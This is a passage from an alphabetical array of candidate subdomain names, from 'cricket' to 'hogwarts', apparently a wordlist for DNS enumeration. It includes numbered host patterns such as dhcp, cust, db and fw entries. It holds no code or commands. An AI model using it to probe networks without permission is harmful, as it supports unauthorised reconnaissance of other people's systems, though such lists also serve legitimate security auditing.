"cricket", "crimson", "cris", "cristina", "crl", "crm", "crocus", "cronos", "cronus", "cross", "crow", "crowd", "crown", "crs", "cruise", "crunch", "crush", "crusher", "crux", "crypto", "crystal", "cs", "cs0", "cs01", "cs02", "cs1", "cs2", "cs3", "cs4", "cs5", "cs6", "csa", "csc", "csd", "cse", "csg", "csi", "csm", "csm1", "csnet-ns", "cso", "csp", "csr", "css", "css1", "cst", "csw1", "ct", "ctc", "cthulhu", "cti", "ctl", "cts", "ctx", "cu", "cub", "cuba", "cube", "cuckoo", "cucumber", "cuda", "culture", "cumin", "cumulus", "cup", "cupcake", "cupid", "cups", "curie", "curium", "curly", "current", "curry", "curtis", "curve", "cust", "cust1", "cust10", "cust100", "cust101", "cust102", "cust103", "cust104", "cust105", "cust106", "cust107", "cust108", "cust109", "cust11", "cust110", "cust111", "cust112", "cust113", "cust114", "cust115", "cust116", "cust117", "cust118", "cust119", "cust12", "cust120", "cust121", "cust122", "cust123", "cust124", "cust125", "cust126", "cust13", "cust14", "cust15", "cust16", "cust17", "cust18", "cust19", "cust2", "cust20", "cust21", "cust22", "cust23", "cust24", "cust25", "cust26", "cust27", "cust28", "cust29", "cust3", "cust30", "cust31", "cust32", "cust33", "cust34", "cust35", "cust36", "cust37", "cust38", "cust39", "cust4", "cust40", "cust41", "cust42", "cust43", "cust44", "cust45", "cust46", "cust47", "cust48", "cust49", "cust5", "cust50", "cust51", "cust52", "cust53", "cust54", "cust55", "cust56", "cust57", "cust58", "cust59", "cust6", "cust60", "cust61", "cust62", "cust63", "cust64", "cust65", "cust66", "cust67", "cust68", "cust69", "cust7", "cust70", "cust71", "cust72", "cust73", "cust74", "cust75", "cust76", "cust77", "cust78", "cust79", "cust8", "cust80", "cust81", "cust82", "cust83", "cust84", "cust85", "cust86", "cust87", "cust88", "cust89", "cust9", "cust90", "cust91", "cust92", "cust93", "cust94", "cust95", "cust96", "cust97", "cust98", "cust99", "custom", "customer", "customer-gw", "customers", "customize", "customs", "cv", "cvs", "cvspserver", "cw", "cwa", "cws", "cx", "cx1", "cx2", "cy", "cyan", "cyber", "cyborgs", "cybozu", "cyclone", "cyclops", "cygnus", "cypher", "cypress", "cyprus", "cyrus", "cz", "d", "d0", "d01", "d02", "d03", "d1", "d1-0", "d10", "d11", "d12", "d13", "d14", "d15", "d16", "d17", "d18", "d19", "d2", "d20", "d21", "d22", "d23", "d24", "d25", "d26", "d27", "d28", "d29", "d3", "d30", "d31", "d32", "d33", "d34", "d35", "d36", "d37", "d38", "d39", "d4", "d40", "d41", "d42", "d43", "d44", "d45", "d46", "d47", "d48", "d49", "d5", "d50", "d51", "d52", "d53", "d54", "d55", "d56", "d57", "d58", "d59", "d6", "d60", "d61", "d62", "d63", "d64", "d65", "d66", "d67", "d68", "d69", "d7", "d70", "d71", "d72", "d73", "d74", "d75", "d76", "d76-01", "d77", "d78", "d79", "d8", "d80", "d81", "d82", "d83", "d84", "d85", "d86", "d87", "d88", "d89", "d9", "d90", "d91", "d92", "d93", "d94", "d95", "d96", "d97", "d98", "d99", "da", "da1", "da2", "daap", "dad", "daedalus", "daemon", "daffy", "dag", "dagobah", "dagobert", "dahlia", "daily", "daisy", "dakar", "dakota", "dal", "dale", "dalek", "dali", "dallas", "dalton", "dam", "dan", "dana", "dance", "dandelion", "danger", "dani", "daniel", "daniela", "danny", "dante", "danube", "daphne", "darcy", "dark", "darkside", "darkstar", "dart", "darth", "darwin", "das", "dash", "dashboard", "dat", "data", "data1", "data2", "data3", "data4", "data5", "database", "database01", "database02", "database1", "database2", "databases", "datacenter", "datalink", "datalink2", "datametrics", "datanet-gw", "datastore", "datatracker", "date", "datos", "dav", "dave", "david", "davinci", "davis", "dawn", "dax", "day", "daytime", "daytona", "db", "db0", "db01", "db02", "db03", "db04", "db05", "db1", "db10", "db11", "db12", "db2", "db3", "db4", "db5", "db6", "db7", "db8", "db9", "dba", "dbadmin", "dbm", "dbs", "dbs1", "dbserver", "dc", "dc0", "dc01", "dc02", "dc1", "dc2", "dc3", "dc4", "dcanet-gw", "dcc", "dcs", "dd", "dds", "de", "de-cix", "de1", "de2", "dead", "deal", "dealer", "dealers", "dean", "dear", "death", "deathstar", "deb", "debbie", "debian", "debussy", "debye", "dec", "decent", "decix", "ded", "dedi", "dedicated", "dee", "deep", "deepblue", "deepthought", "deer", "def", "default", "default-gw", "defender", "defiant", "definite", "degas", "deimos", "del", "delaware", "delfin", "delight", "deliver", "delivery", "dell", "dell1", "dell2", "delos", "delphi", "delta", "delta1", "dem", "demeter", "demo", "demo1", "demo2", "demo3", "demo4", "demo5", "demon", "demon-gw", "demonstration", "demos", "demostration", "den", "denali", "deneb", "denis", "denise", "dennis", "dent", "denver", "deob", "deploy", "depot", "dept", "derby", "derek", "des", "desarrollo", "descargas", "descartes", "desdemona", "desert", "design", "designer", "desire", "desk", "desktop", "despina", "destiny", "destservice", "destservice2", "detail", "detect", "determined", "detroit", "deutschland", "dev", "dev-www", "dev0", "dev01", "dev02", "dev03", "dev1", "dev2", "dev3", "dev4", "dev5", "dev6", "dev7", "deve", "devel", "develop", "developer", "developers", "development", "device", "devil", "devnull", "devon", "devserver", "devsql", "devweb", "dewey", "dexter", "df", "dfw", "dg", "dh", "dhcp", "dhcp-1", "dhcp-10", "dhcp-11", "dhcp-12", "dhcp-13", "dhcp-14", "dhcp-15", "dhcp-16", "dhcp-17", "dhcp-18", "dhcp-19", "dhcp-2", "dhcp-20", "dhcp-21", "dhcp-22", "dhcp-23", "dhcp-24", "dhcp-25", "dhcp-26", "dhcp-27", "dhcp-28", "dhcp-29", "dhcp-3", "dhcp-30", "dhcp-31", "dhcp-32", "dhcp-33", "dhcp-34", "dhcp-35", "dhcp-36", "dhcp-37", "dhcp-38", "dhcp-39", "dhcp-4", "dhcp-40", "dhcp-41", "dhcp-42", "dhcp-43", "dhcp-44", "dhcp-45", "dhcp-46", "dhcp-47", "dhcp-48", "dhcp-49", "dhcp-5", "dhcp-50", "dhcp-51", "dhcp-52", "dhcp-53", "dhcp-54", "dhcp-55", "dhcp-56", "dhcp-57", "dhcp-58", "dhcp-59", "dhcp-6", "dhcp-60", "dhcp-61", "dhcp-62", "dhcp-63", "dhcp-64", "dhcp-65", "dhcp-66", "dhcp-67", "dhcp-68", "dhcp-69", "dhcp-7", "dhcp-70", "dhcp-71", "dhcp-72", "dhcp-73", "dhcp-74", "dhcp-75", "dhcp-76", "dhcp-77", "dhcp-78", "dhcp-79", "dhcp-8", "dhcp-80", "dhcp-81", "dhcp-82", "dhcp-83", "dhcp-84", "dhcp-85", "dhcp-86", "dhcp-87", "dhcp-88", "dhcp-89", "dhcp-9", "dhcp-90", "dhcp-91", "dhcp-92", "dhcp-93", "dhcp-94", "dhcp-95", "dhcp-96", "dhcp-97", "dhcp-98", "dhcp-99", "dhcp-pool", "dhcp0", "dhcp01", "dhcp02", "dhcp03", "dhcp04", "dhcp05", "dhcp06", "dhcp07", "dhcp08", "dhcp09", "dhcp1", "dhcp10", "dhcp11", "dhcp12", "dhcp13", "dhcp14", "dhcp15", "dhcp16", "dhcp17", "dhcp18", "dhcp19", "dhcp2", "dhcp20", "dhcp21", "dhcp22", "dhcp23", "dhcp24", "dhcp25", "dhcp26", "dhcp27", "dhcp28", "dhcp29", "dhcp3", "dhcp30", "dhcp31", "dhcp32", "dhcp33", "dhcp34", "dhcp35", "dhcp36", "dhcp37", "dhcp38", "dhcp39", "dhcp4", "dhcp40", "dhcp41", "dhcp42", "dhcp43", "dhcp44", "dhcp45", "dhcp46", "dhcp47", "dhcp48", "dhcp49", "dhcp5", "dhcp50", "dhcp51", "dhcp52", "dhcp53", "dhcp54", "dhcp55", "dhcp56", "dhcp57", "dhcp58", "dhcp59", "dhcp6", "dhcp60", "dhcp61", "dhcp62", "dhcp63", "dhcp64", "dhcp65", "dhcp66", "dhcp67", "dhcp68", "dhcp69", "dhcp7", "dhcp70", "dhcp71", "dhcp72", "dhcp73", "dhcp74", "dhcp75", "dhcp76", "dhcp77", "dhcp78", "dhcp79", "dhcp8", "dhcp80", "dhcp81", "dhcp82", "dhcp83", "dhcp84", "dhcp85", "dhcp86", "dhcp87", "dhcp88", "dhcp89", "dhcp9", "dhcp90", "dhcp91", "dhcp92", "dhcp93", "dhcp94", "dhcp95", "dhcp96", "dhcp97", "dhcp98", "dhcp99", "di", "di1", "dia", "diablo", "diagonal", "dial", "dial-1", "dial-10", "dial-11", "dial-12", "dial-13", "dial-14", "dial-15", "dial-16", "dial-17", "dial-18", "dial-19", "dial-2", "dial-20", "dial-21", "dial-22", "dial-23", "dial-24", "dial-25", "dial-26", "dial-27", "dial-28", "dial-29", "dial-3", "dial-30", "dial-31", "dial-32", "dial-33", "dial-34", "dial-35", "dial-36", "dial-37", "dial-38", "dial-39", "dial-4", "dial-40", "dial-41", "dial-42", "dial-43", "dial-44", "dial-45", "dial-46", "dial-47", "dial-48", "dial-49", "dial-5", "dial-50", "dial-51", "dial-52", "dial-53", "dial-55", "dial-56", "dial-57", "dial-58", "dial-6", "dial-7", "dial-8", "dial-9", "dial1", "dial10", "dial11", "dial12", "dial13", "dial14", "dial15", "dial16", "dial17", "dial18", "dial19", "dial2", "dial20", "dial21", "dial22", "dial23", "dial24", "dial25", "dial26", "dial27", "dial28", "dial29", "dial3", "dial30", "dial4", "dial5", "dial6", "dial7", "dial8", "dial9", "dialin", "dialin1", "dialin2", "dialog", "dialup", "dialup-1", "dialup1", "dialup10", "dialup11", "dialup12", "dialup13", "dialup14", "dialup15", "dialup16", "dialup17", "dialup18", "dialup19", "dialup2", "dialup20", "dialup21", "dialup22", "dialup23", "dialup24", "dialup25", "dialup26", "dialup27", "dialup28", "dialup29", "dialup3", "dialup30", "dialup31", "dialup4", "dialup5", "dialup6", "dialup7", "dialup8", "dialup9", "diamant", "diamond", "diana", "diane", "diary", "dias", "dick", "dict", "dido", "die", "diego", "diesel", "diet", "different", "dig", "digi", "digital", "dijkstra", "dilbert", "dill", "dima", "dingo", "dino", "diogenes", "dione", "dionis", "dionysos", "dionysus", "dip", "dir", "dir1", "dirac", "dircproxy", "direct", "director", "directory", "dirk", "dis", "disc", "discard", "disco", "discover", "discovery", "discuss", "discussion", "discussions", "disk", "disney", "dispatch", "display", "dist", "dist02", "distance", "distcc", "distmp3", "distribute", "distributer", "distributers", "distribution", "diva", "dixie", "dizzy", "dj", "django", "dk", "dl", "dl1", "dl2", "dlink", "dls", "dlv", "dm", "dm1", "dmail", "dmc", "dms", "dmta1", "dmz", "dmz-gw", "dmz1", "dmz2", "dn", "dna", "dnews", "dns", "dns-1", "dns-2", "dns-a", "dns-b", "dns-cache1", "dns-cache2", "dns0", "dns00", "dns01", "dns02", "dns03", "dns04", "dns1", "dns10", "dns11", "dns2", "dns3", "dns4", "dns5", "dns6", "dns7", "dns8", "dnsa", "dnsb", "dnscache", "dnscache1", "dnscache2", "dnstest", "do", "do-atman", "doc", "dock", "docs", "doctor", "document", "documentacion", "documentos", "documents", "docushare", "dodge", "dodo", "dog", "dogbert", "dogmatix", "dogwood", "dollar", "dolly", "dolphin", "dom", "dom0", "domain", "domain-controller", "domaincontroller", "domains", "dominio", "dominion", "domino", "domino1", "domino2", "dominoweb", "don", "donald", "donatello", "done", "dong", "donkey", "donna", "dont", "doom", "door", "doors", "dopey", "doppler", "dora", "dorado", "dori", "doris", "dorothy", "dory", "dos", "dot", "dotnet", "double", "doug", "douglas", "dove", "dover", "down", "download", "downloads", "downtown", "dox", "doxygen", "dozer", "dp", "dp1", "dp2", "dpm", "dport", "dps", "dq", "dr", "dr01", "dr02", "dr1", "dr2", "draal", "drac", "draco", "dracula", "dragon", "dragonfly", "drake", "dream", "dresden", "drew", "drive", "drm", "drmail", "droopy", "drop", "dropbox", "drucker", "druid", "drum", "drupal", "drweb", "dry", "ds", "ds0-ether", "ds01", "ds02", "ds1", "ds2", "ds3", "ds4", "ds9", "dsc", "dsl", "dsl-gw", "dsl1", "dsl2", "dsl3", "dsl4", "dslam", "dslam0", "dslam1", "dslam2", "dslgw", "dsp", "dspace", "dss", "dt", "dtc", "dti01", "dts", "du", "dual", "dublin", "duck", "dude", "duke", "dumbledore", "dumbo", "dummy", "dump", "duncan", "dune", "duo", "durian", "durin", "dust", "dusty", "dv", "dv4", "dvd", "dvorak", "dvr", "dvr1", "dw", "dwarf", "dx", "dy", "dylan", "dyn", "dyn1", "dyn10", "dyn11", "dyn12", "dyn13", "dyn14", "dyn15", "dyn16", "dyn17", "dyn18", "dyn19", "dyn2", "dyn20", "dyn21", "dyn22", "dyn23", "dyn24", "dyn25", "dyn26", "dyn27", "dyn28", "dyn29", "dyn3", "dyn30", "dyn31", "dyn32", "dyn33", "dyn34", "dyn35", "dyn36", "dyn37", "dyn38", "dyn39", "dyn4", "dyn40", "dyn41", "dyn42", "dyn43", "dyn44", "dyn45", "dyn46", "dyn47", "dyn48", "dyn5", "dyn6", "dyn7", "dyn8", "dyn88", "dyn9", "dyn91", "dyn92", "dyn94", "dynamic", "dynamics", "dynamo", "dynip", "dz", "e", "e-0", "e-com", "e-commerce", "e-learning", "e-mail", "e0", "e0-0", "e0-1", "e0-l", "e01", "e1", "e10", "e11", "e12", "e2", "e20", "e20-2", "e20-3", "e21", "e22", "e23", "e24", "e3", "e4", "e5", "e6", "e7", "e8", "e9", "ea", "eaccess", "ead", "eager", "eagle", "eagle1", "eagle2", "ear", "earl", "earth", "eas", "east", "easy", "eb", "ebill", "ebiz", "ebony", "ebook", "ebs", "ebusiness", "ec", "ec1", "ec2", "ecf", "echelon", "echidna", "echo", "eclass", "eclipse", "ecm", "eco", "eco1", "ecom", "ecommerce", "econ", "ecs", "ed", "ed1", "ed10", "ed11", "ed12", "ed13", "ed14", "ed15", "ed16", "ed17", "ed18", "ed19", "ed2", "ed20", "ed21", "ed22", "ed23", "ed24", "ed25", "ed26", "ed27", "ed28", "ed29", "ed3", "ed30", "ed31", "ed32", "ed33", "ed34", "ed35", "ed36", "ed37", "ed38", "ed39", "ed4", "ed40", "ed41", "ed42", "ed43", "ed44", "ed45", "ed46", "ed47", "ed48", "ed49", "ed5", "ed50", "ed51", "ed52", "ed53", "ed54", "ed55", "ed56", "ed57", "ed58", "ed59", "ed6", "ed60", "ed61", "ed62", "ed63", "ed64", "ed65", "ed66", "ed67", "ed68", "ed69", "ed7", "ed70", "ed71", "ed72", "ed73", "ed74", "ed75", "ed76", "ed77", "ed78", "ed79", "ed8", "ed80", "ed81", "ed82", "ed83", "ed84", "ed85", "ed86", "ed87", "ed88", "ed89", "ed9", "ed90", "ed91", "ed92", "ed93", "ed94", "ed95", "ed96", "ed97", "ed98", "ed99", "eddie", "eddy", "eden", "edgar", "edge", "edge01", "edge1", "edge2", "edge3", "edi", "edison", "edit", "editor", "edm", "edna", "edoc", "eds", "edu", "education", "eduroam", "edward", "ee", "eel", "eeyore", "ef", "effect", "effective", "efnet", "eg", "egg", "eggdrop", "egret", "egroups", "egypt", "eh", "ehx", "ei", "eiger", "eight", "einstein", "eip", "eis", "ej", "ejemplo", "ejemplos", "ek", "eklogin", "el", "elaine", "elara", "elba", "elbe", "eldorado", "elearn", "elearning", "electra", "electro", "electron", "elektra", "element", "elena", "elephant", "eleven", "elf", "elgar", "eli", "elias", "elisa", "elite", "elizabeth", "elk", "ella", "ellen", "ellis", "elm", "elmer", "elmo", "elpaso", "elrond", "els", "elsa", "elvira", "elvis", "elwood", "em", "em0", "em1", "em2", "ema", "email", "email1", "email2", "email3", "email4", "emails", "emailsecurity", "emc", "emerald", "emerson", "emi", "emil", "emily", "emkt-ip01", "emkt-ip02", "emkt-ip03", "emkt-ip04", "emkt-ip05", "emkt-ip06", "emm", "emma", "emp", "emperor", "empire", "employee", "employees", "empresa", "empresas", "empty", "ems", "ems1", "emu", "en", "en0", "en01", "enable", "enbd-cstatd", "enbd-sstatd", "enc", "enceladus", "encoder", "encore", "end", "endeavor", "endeavour", "ender", "endor", "energy", "enews", "eng", "eng01", "eng1", "engine", "engineer", "engineering", "english", "eniac", "enigma", "enough", "enroll", "enrutador", "ensim", "ent", "enter", "enterprise", "entropy", "entry", "enum", "envy", "enzo", "eo", "eomer", "eon", "eos", "eowyn", "ep", "epaper", "epay", "epi", "epic", "epimetheus", "epm", "epo", "eportal", "eportfolio", "epost", "epp", "eprints", "eps", "epsilon", "epson", "epzilon", "eq", "equal", "equation", "equinix-paris", "equinox", "equivalent", "er", "er1", "era", "erasmus", "erato", "erbium", "erde", "erdos", "erebus", "eric", "erica", "eridanus", "erie", "erik", "erika", "erin", "eris", "ermis", "ernie", "ernst", "eroom", "eros", "erp", "error", "erwin", "es", "es1", "es2", "esa", "esa1", "esa2", "esafe", "esb", "esc", "escape", "escher", "esd", "eservice", "eservices", "eshop", "esm", "esmeralda", "esp", "espanol", "espresso", "ess", "essential", "essex", "est", "estadisticas", "esther", "estimate", "estore", "esx", "esx01", "esx02", "esx03", "esx04", "esx1", "esx2", "esx3", "esx4", "esx5", "esx6", "esxi", "esxi01", "esxi1", "esxi2", "et", "et0", "et0-0", "et1", "et2", "eta", "etc", "eth", "eth-0", "eth-14", "eth-15", "eth-16", "eth-2", "eth-21", "eth-22", "eth-23", "eth-24", "eth-25", "eth-26", "eth-27", "eth-29", "eth-3", "eth-31", "eth-32", "eth-33", "eth-34", "eth-35", "eth-36", "eth-37", "eth-38", "eth-39", "eth-4", "eth-5", "eth-6", "eth-65", "eth-68", "eth-69", "eth-7", "eth-71", "eth-78", "eth-8", "eth-81", "eth0", "eth0-0", "eth1", "eth2", "eth3", "ether", "ether1", "ethernet", "ethernet0", "ethernet0-0", "ethernet2", "ethernet2-0", "ethernet3-0", "etna", "etrn", "ets", "eu", "eu1", "eu2", "euclid", "eugene", "euklid", "euler", "eunet-gw", "eunomia", "eureka", "euro", "europa", "europe", "europium", "euterpe", "ev", "eva", "eval", "evaluate", "evans", "eve", "even", "event", "eventos", "events", "everest", "evergreen", "everything", "evil", "evo", "evolution", "ew", "ewa", "ews", "ex", "ex01", "ex1", "ex2", "exact", "exam", "example", "examples", "exc", "excalibur", "excel", "excelsior", "exch", "exch01", "exch1", "exch2", "exchange", "exchange-server", "exchange-server2", "exchange01", "exchange02", "exchange1", "exchange2", "exchange3", "exclusive", "exec", "exeter", "exit", "exmail", "exodus", "exp", "expand", "experience", "expert", "explicit", "explore", "explorer", "expo", "export", "express", "expresso", "ext", "ext-gw", "ext-nat", "ext1", "ext2", "ext3", "extension", "extern", "external", "extmail", "extra", "extranet", "extranet2", "extreme", "ey", "eye", "eyes", "eyigw", "ez", "ezproxy", "f", "f0", "f0-0", "f0-1", "f00", "f01", "f1", "f1-0", "f10", "f11", "f12", "f14", "f15", "f2", "f20", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "fa", "fa-0-0", "fa0", "fa0-0", "fa0-1", "fa1-0", "fa2-0", "face", "facebook", "facilities", "facility", "fact", "factory", "faculty", "failover", "fair", "faith", "faithful", "falbala", "falco", "falcon", "fall", "fallback", "family", "famous", "fan", "fang", "fangorn", "fantastic", "faq", "far", "faraday", "faramir", "fargo", "farm", "farmer", "farnsworth", "faro", "fas0-0", "fast", "fastethernet0", "fastethernet0-0", "faststats", "fat", "fatboy", "father", "fatserv", "fault-mgmt", "fault-mgmt2", "faust", "fax", "faxserver", "fay", "fb", "fc", "fc1", "fc2", "fcs", "fd", "fe", "fe0", "fe0-0", "fe0-1", "fe01", "fe02", "fe03", "fe04", "fe05", "fe1", "fe1-0", "fe10", "fe11", "fe12", "fe2", "fe2-0", "fe3", "fe3-0", "fe4", "fe4-0", "fe5", "fe5-0", "fe6", "fe7", "fe8", "fear", "feather", "feature", "fed", "federation", "fedora", "feed", "feed1", "feedback", "feeds", "felix", "femto", "fender", "fenix", "fennel", "fenrir", "fenris", "fermat", "fermi", "fermion", "fern", "fernando", "ferrari", "ferret", "feynman", "ff", "fg", "fh", "fi", "fiber", "fiber-channel", "fiber-channel2", "fiberlink", "fibonacci", "fido", "field", "fig", "figaro", "fiji", "file", "file1", "filemaker", "filer", "filer1", "filer2", "files", "filesender", "fileserv", "fileserver", "fileshare", "filestore", "filetransfer", "film", "filter", "filter1", "filter2", "fin", "finance", "finch", "find", "fine", "finger", "finn", "fiona", "fir", "fire", "fire1", "fire2", "fireball", "firebird", "firebox", "firefly", "firepass", "firewall", "firewall1", "firewall2", "firma", "first", "firstclass", "fis", "fischer", "fish", "fisher", "fit", "five", "fix", "fixes", "fj", "fk", "fl", "flag", "flame", "flamingo", "flanders", "flare", "flash", "flat", "flea", "fleet", "fleming", "flex", "flexo", "flight", "flint", "flip", "flipper", "flo", "float", "flood", "flor", "flora", "florence", "florida", "flounder", "flow", "flower", "floyd", "fluent", "fluffy", "fluid", "fluke", "fluorine", "flush", "flute", "flux", "fly", "fm", "fmp", "fms", "fn", "fo", "fobos", "focus", "fog", "foghorn", "fold", "folders", "font-service", "foo", "foobar", "food", "foot", "football", "footer", "for", "force", "ford", "foreign", "forest", "forever", "forge", "fork", "form", "formacion", "format", "forms", "formula", "fornax", "foro", "foros", "fort", "forte", "fortimail", "fortress", "fortuna", "fortworth", "forum", "forums", "forward", "foster", "foto", "fotos", "foundation", "foundry", "four", "fourier", "fox", "foxtrot", "fozzie", "fp", "fp1", "fq", "fr", "fr1", "fr2", "fr3", "fractal", "frame", "frame-relay", "frame-relay2", "france", "francis", "francium", "frank", "frankfurt", "frankie", "franklin", "franz", "fred", "freddy", "free", "freebox", "freebsd", "freebsd0", "freebsd01", "freebsd02", "freebsd1", "freebsd2", "freedom", "freedommail", "freemail", "freeman", "freenas", "freeware", "freja", "fremont", "frequency", "fresh", "fresnel", "fresno", "freud", "freya", "frida", "friday", "friend", "friendly", "friends", "frigg", "fritz", "frodo", "frog", "from", "front", "front1", "front2", "frontdesk", "frontend", "frontier", "frontpage", "frost", "frox", "frozen", "frugal", "fruit", "fry", "fs", "fs01", "fs02", "fs1", "fs2", "fs3", "fs4", "fsp", "fss", "ft", "ftb", "ftir", "ftp", "ftp-", "ftp-data", "ftp0", "ftp01", "ftp02", "ftp1", "ftp2", "ftp3", "ftp4", "ftp5", "ftp6", "ftpd", "ftps", "ftps-data", "ftpsbkup", "ftpserver", "ftptest", "fts", "fu", "fuchs", "fuck", "fuel", "fugu", "fuji", "full", "fun", "funk", "funny", "fury", "fusion", "future", "fuzzy", "fv", "fw", "fw-1", "fw-dmz", "fw-ext", "fw0", "fw00", "fw01", "fw02", "fw03", "fw1", "fw1-gw", "fw2", "fw3", "fw4", "fw5", "fwall", "fwsm", "fwsm0", "fwsm01", "fwsm1", "fx", "fxp0", "fy", "fz", "g", "g0", "g0-0", "g0-1", "g0-2", "g0-26", "g0-3", "g01", "g1", "g1-1", "g1-2", "g10", "g2", "g2-0", "g3", "g4", "g4-0", "g5", "g6", "g7", "ga", "gabi", "gabriel", "gadget", "gaea", "gaia", "gal", "gala", "galactica", "galadriel", "galahad", "galatea", "galaxy", "gale", "galena", "galeria", "galerias", "galerie", "galilei", "galileo", "gallant", "galleries", "gallery", "gallium", "galois", "gama", "gambit", "game", "game1", "game2", "games", "gameserver", "gaming", "gamma", "gandalf", "ganesh", "ganesha", "ganges", "ganr", "ganymed", "ganymede", "gap", "gar", "garage", "garcia", "garden", "garfield", "gargamel", "gargoyle", "garlic", "garnet", "garuda", "gary", "gas", "gast", "gaston", "gate", "gate01", "gate02", "gate1", "gate2", "gate3", "gate4", "gate5", "gatekeeper", "gatekeeper2", "gates", "gateway", "gateway01", "gateway02", "gateway1", "gateway2", "gateway3", "gateway4", "gator", "gaudi", "gauguin", "gauntlet", "gauss", "gazelle", "gb", "gc", "gd", "gdomap", "gds_db", "ge", "ge-0", "ge-0-0-0-0", "ge-dr1", "ge0", "ge0-0", "ge0-1", "ge0-2", "ge0-3", "ge1", "ge1-0", "ge1-1", "ge1-2", "ge1-3", "ge1-4", "ge11", "ge13", "ge17-0", "ge18-0", "ge2-0", "ge2-1", "ge2-2", "ge3-0", "ge3-1", "ge3-2", "ge4-0", "ge4-1", "ge5-0", "ge5-1", "ge5-2", "ge6-1", "gea", "geb", "gecko", "ged", "geek", "gem", "gemini", "gemini01", "gemini03", "gemma", "gen", "gene", "general", "generic", "genesis", "geneva", "genie", "genius", "genome", "gentle", "gentoo", "geo", "geo1", "george", "georgia", "ger", "germanium", "germany", "geronimo", "gershwin", "gestion", "get", "getafix", "geth0", "gf", "gforge", "gg", "ggz", "gh", "ghost", "gi", "gi-0-1", "gi0-0", "gi0-1", "gi0-2", "gi0-3", "gi1-1", "gi1-2", "gi1-3", "gi1-4", "gi1-7", "gi2-0", "gi2-1", "gi3-1", "gi3-2", "gi3-3", "gi4-1", "gi5-1", "gi5-2", "giant", "gibbs", "gibson", "gift", "gifted", "gig0-1", "gig0-2", "gig0-3", "gig01", "gig17-0", "gig18-0", "gig2-1", "gig2-2", "gig2-3", "gig2-4", "giga", "gigabitethernet0", "gigabitethernet0-0", "gigabitethernet0-1", "gigabitethernet0-2", "gigabitethernet1", "gigabitethernet2", "gige-g0-1", "gige-gbge0", "gilbert", "gilford", "gimli", "gin", "gina", "ginger", "ginkgo", "giotto", "gir", "giraffe", "gis", "gis1", "gis2", "git", "give", "gizmo", "gj", "gk", "gk1", "gl", "glacier", "glad", "gladiator", "glados", "glasgow", "glass", "glendale", "glenn", "global", "globe", "globus", "gloin", "gloria", "glorious", "glory", "glow", "gluon", "gm", "gmail", "gms", "gn", "gnat", "gnome", "gnu", "gnutella-rtr", "gnutella-svc", "go", "goat", "goblin", "god", "godel", "godzilla", "goedel", "goethe", "gogrid", "gold", "golden", "golden-gw", "goldfish", "goldmine", "golem", "golf", "goliat", "goliath", "gollum", "gomez", "gondor", "gonzo", "good", "goodhue", "goofy", "google", "goose", "gopher", "gordon", "gorgon", "gorilla", "gort", "got", "gouda", "gov", "goya", "gozer", "gp", "gprs", "gprs2", "gps", "gpsd", "gq", "gr", "gra", "grace", "grad", "grade", "graham", "grain", "granada", "grand", "granite", "grant", "grape", "grapefruit", "graph", "graphics", "graphite", "graphs", "grass", "grasshopper", "grateful", "graviton", "gravity", "gray", "great", "green", "greg", "gregory", "gremlin", "grendel", "grey", "grid", "grid1", "grieg", "griffin", "grimlock", "grizzly", "grnetrouter", "gromit", "groove", "groucho", "ground", "group", "grouper", "groups", "groupware", "groupwise", "grouse", "grover", "growth", "grumpy", "grus", "gryphon", "gs", "gs1", "gs2", "gsa", "gsm", "gsx", "gt", "gts", "gtw", "gu", "guard", "guardian", "guava", "guest", "guest1", "guest2", "guest3", "guest4", "guests", "guia", "guide", "guido", "guinness", "guitar", "gull", "gumby", "guppy", "guru", "gus", "gustav", "gutenberg", "guy", "gv", "gvt-l0", "gw", "gw-1", "gw-2", "gw-dmz", "gw-ext", "gw-ipv6", "gw-ll", "gw-ndh", "gw0", "gw01", "gw02", "gw03", "gw04", "gw1", "gw10", "gw11", "gw12", "gw13", "gw14", "gw15", "gw16", "gw2", "gw20", "gw3", "gw4", "gw5", "gw6", "gw7", "gw8", "gw9", "gwa", "gwb", "gwia", "gwmail", "gwmobile", "gws", "gww", "gwweb", "gx", "gy", "gypsy", "gz", "h", "h0", "h01", "h02", "h03", "h04", "h05", "h06", "h08", "h1", "h10", "h11", "h12", "h13", "h14", "h15", "h16", "h17", "h18", "h19", "h2", "h20", "h21", "h22", "h23", "h24", "h25", "h26", "h27", "h28", "h29", "h2o", "h3", "h30", "h31", "h32", "h33", "h34", "h35", "h36", "h37", "h38", "h39", "h4", "h40", "h41", "h42", "h43", "h44", "h45", "h46", "h47", "h48", "h49", "h5", "h50", "h51", "h52", "h53", "h54", "h55", "h56", "h57", "h58", "h59", "h6", "h60", "h61", "h62", "h63", "h64", "h65", "h66", "h67", "h68", "h69", "h7", "h70", "h71", "h72", "h73", "h74", "h75", "h76", "h77", "h78", "h79", "h8", "h80", "h81", "h82", "h83", "h84", "h85", "h86", "h87", "h88", "h89", "h9", "h90", "h91", "h92", "h93", "h94", "h95", "h96", "h97", "h98", "h99", "ha", "ha1", "ha2", "habanero", "hack", "hacked", "hacker", "hadar", "haddock", "hades", "hadrian", "hadron", "hafnium", "hagrid", "hahn", "hail", "hal", "halflife", "hall", "halley", "halo", "ham", "hamburg", "hamilton", "hamlet", "hammer", "hammerhead", "hamster", "han", "hana", "hancock", "hand", "handel", "handy", "hank", "hanna", "hannah", "hannibal", "hans", "hansolo", "happy", "haproxy", "har", "harbor", "hard", "hardy", "hare", "harley", "harmony", "harold", "harp", "harpo", "harrier", "harris", "harrison", "harry", "harvey", "has", "hat", "hathor", "havana", "haven", "hawaii", "hawk", "hawkeye", "hawking", "haydn", "hayes", "hazel", "hb", "hc", "hd", "hd2", "he", "head", "header", "health", "healthy", "heart", "heat", "heather", "heaven", "hebe", "hecate", "hector", "hedgehog", "hedwig", "hegel", "heidi", "heimdall", "heisenberg", "hektor", "hel", "helen", "helena", "helene", "helga", "helios", "helium", "helix", "hell", "hello", "helm", "helmholtz", "helo", "help", "helpdesk", "helpdesk2", "helpful", "helponline", "helsinki", "hemera", "hemlock", "hen", "hendrix", "henry", "hephaestus", "hephaistos", "hera", "heracles", "herakles", "herb", "herbert", "hercule", "hercules", "heritage", "herkules", "herman", "hermes", "hermes2", "hermione", "hero", "heron", "herring", "hertz", "hestia", "hetzner", "hex", "hey", "hf", "hg", "hh", "hi", "hibiscus", "hickory", "hidden", "hide", "higgs", "high", "hikari", "hilbert", "hill", "himalaya", "himalia", "hip", "hippo", "hiring", "hiro", "his", "history", "hit", "hive", "hj", "hk", "hkp", "hl", "hm", "hmc", "hme1", "hmmp-ind", "hn", "ho", "hobbes", "hobbit", "hobby-gw", "hockey", "hod", "hogwarts", 